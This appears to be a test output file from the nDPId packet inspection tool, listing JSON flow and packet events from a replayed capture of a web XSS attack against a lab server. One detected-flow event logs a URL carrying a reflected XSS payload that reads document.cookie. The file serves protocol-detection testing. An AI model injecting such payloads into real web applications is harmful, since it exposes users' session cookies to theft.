+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":3,"flow_last_seen":1499348069427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348069427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06kZAAD4G25GsEAABwKgKMos4AFDyvfGglr67X4AQAOUumwAAAQEICgE9G9oD5u1O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348070791,"flow_last_seen":1499348070791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070791,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1499348070791,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jQtAAD4GOMWsEAABwKgKMotGAFAklpAkAAAAAKACchAARwAAAgQFtAQCCAoBPR0vAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":2,"flow_last_seen":1499348070791,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi0aOH7cfJJaQJaAScSDJXAAAAgQFtAQCCAoD5u6jAT0dLwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":3,"flow_last_seen":1499348070792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348070792,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jQxAAD4GOMysEAABwKgKMotGAFAklpAljh+3IIAQAOVoZAAAAQEICgE9HS8D5u6j"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348072088,"flow_last_seen":1499348072088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348072088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1499348072088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DYZAAD4GuEqsEAABwKgKMotUAFAOsRP1AAAAAKACchCRCQAAAgQFtAQCCAoBPR5zAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":2,"flow_last_seen":1499348072088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi1Q00\/Q8DrET9qAScSB1CgAAAgQFtAQCCAoD5u\/nAT0ecwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":3,"flow_last_seen":1499348072089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348072089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DYdAAD4GuFGsEAABwKgKMotUAFAOsRP2NNP0PYAQAOUUEgAAAQEICgE9HnMD5u\/n"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348073365,"flow_last_seen":1499348073365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348073365,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1499348073365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pg1AAD4Gh8OsEAABwKgKMotiAFCjeCG\/AAAAAKACchDtKgAAAgQFtAQCCAoBPR+yAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":2,"flow_last_seen":1499348073365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi2IT1M33o3ghwKAScSAXMQAAAgQFtAQCCAoD5vEmAT0fsgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9164,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":3,"flow_last_seen":1499348073366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348073366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Pg5AAD4Gh8qsEAABwKgKMotiAFCjeCHAE9TN+IAQAOW2NwAAAQEICgE9H7MD5vEm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348074670,"flow_last_seen":1499348074670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348074670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1499348074670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OC5AAD4GjaKsEAABwKgKMotwAFDSMxjXAAAAAKACchDGAgAAAgQFtAQCCAoBPSD5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":2,"flow_last_seen":1499348074670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi3D0f4w30jMY2KAScSBP1gAAAgQFtAQCCAoD5vJtAT0g+QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":3,"flow_last_seen":1499348074671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348074671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OC9AAD4GjamsEAABwKgKMotwAFDSMxjY9H+MOIAQAOXu3QAAAQEICgE9IPkD5vJt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348077218,"flow_last_seen":1499348077218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348077218,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1499348077218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HtAAD4G9VSsEAABwKgKMouKAFBc0\/MNAAAAAKACchBelQAAAgQFtAQCCAoBPSN2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":2,"flow_last_seen":1499348077218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi4oOSV5eXNPzDqAScSD5+wAAAgQFtAQCCAoD5vTqAT0jdgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":3,"flow_last_seen":1499348077219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348077219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HxAAD4G9VusEAABwKgKMouKAFBc0\/MODkleX4AQAOWZAwAAAQEICgE9I3YD5vTq"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348078531,"flow_last_seen":1499348078531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348078531,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1499348078531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078531,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86yNAAD4G2qysEAABwKgKMouYAFAizM+dAAAAAKACchC6tgAAAgQFtAQCCAoBPSS+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9205,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":2,"flow_last_seen":1499348078532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078532,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi5glYndPIszPnqAScSAkywAAAgQFtAQCCAoD5vYyAT0kvgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":3,"flow_last_seen":1499348078532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348078532,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yRAAD4G2rOsEAABwKgKMouYAFAizM+eJWJ3UIAQAOXD0gAAAQEICgE9JL4D5vYy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348081113,"flow_last_seen":1499348081113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1499348081113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P1ZAAD4GhnqsEAABwKgKMouyAFAGWhgVAAAAAKACchCMEgAAAgQFtAQCCAoBPSdDAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9226,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":2,"flow_last_seen":1499348081113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi7IGSc2TBloYFqAScSC8dgAAAgQFtAQCCAoD5vi3AT0nQwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9227,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":3,"flow_last_seen":1499348081114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348081114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P1dAAD4GhoGsEAABwKgKMouyAFAGWhgWBknNlIAQAOVbfQAAAQEICgE9J0QD5vi3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 